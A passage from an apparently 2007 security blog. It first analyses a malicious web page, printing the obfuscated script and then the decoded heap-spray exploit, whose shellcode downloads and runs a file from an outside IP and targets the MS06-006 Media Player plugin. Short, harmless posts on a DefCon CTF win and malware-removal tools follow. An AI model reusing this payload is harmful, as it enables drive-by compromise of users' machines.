d5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>

In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".

The final part of the decoded page might look familiar....if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.

the H@cker Elite: UF engineers compete in Vegas

2007-08-09T19:56:00.000-04:00

Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.

I think that April Dudash from the Alligator did a wonderful job (article) capturing that sentiment. Thank you, April.

And, thank you, team 1@stplace and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.

1@stplace wins DefCon CTF 2 yrs in a row

2007-08-05T22:46:00.000-04:00

After 24 hrs of competition over 3 days in Vegas, team 1@stplace took first place in the DefCon Capture the Flag contest hosted by Kenshoto. Headed up by team captain @tlas and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.

I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, psifertex, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.

Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.

Evil Bits: Fighting Forensics

2007-07-30T20:07:00.000-04:00

As if freelance writing with things now appearing in both Network Computing and Information Week magazines weren't keeping me busy enough, I'm now a blogger with DarkReading.com. My blog is titled "Evil Bits" and the first post is now available, "Fighting Forensics." It covers some of the current news surrounding antiforensics being released at Black Hat this week, a little history about this area of research and links to previous presentations from Black Hat. Chew up a red pill and take a read...

Microsoft Malware Removal Starter Kit

2007-07-23T12:11:00.000-04:00

I came across this "Microsoft Malware Removal Starter Kit" Friday evening. I don' remember where I saw it, now, but it was released on July 10 and didn't get any recognition in any of the blogs that I frequent.

Basically, they've put together instructions for what I had created while at a previous position here at UF. The HelpDesk for our dept needed a way to do offline scanning and no one was capable of using a Linux Live boot CD to run ClavAV, so I created a disk with BartPE and included several useful tools such as a registry editor and CLI version of McAfee VirusScan.

While BartPE bordered on being a violation of MS' EULA, it never became a target of MS for a takedown. It's interesting that MS has now decided to leverage their WinPE for doing malware removal. Sure, they leave it up to the user to create the disk and add the tools, but they have a brain dead guide on how to do it. Maybe someone at MS said, "Hey, we use this WinPE thingie for creating images for deploying via WDS and installing Windows. I bet we could add more tools and make it even more useful." Well, they probably didn't say that, but I'm glad they didn't say something like, "How can we charge for this!"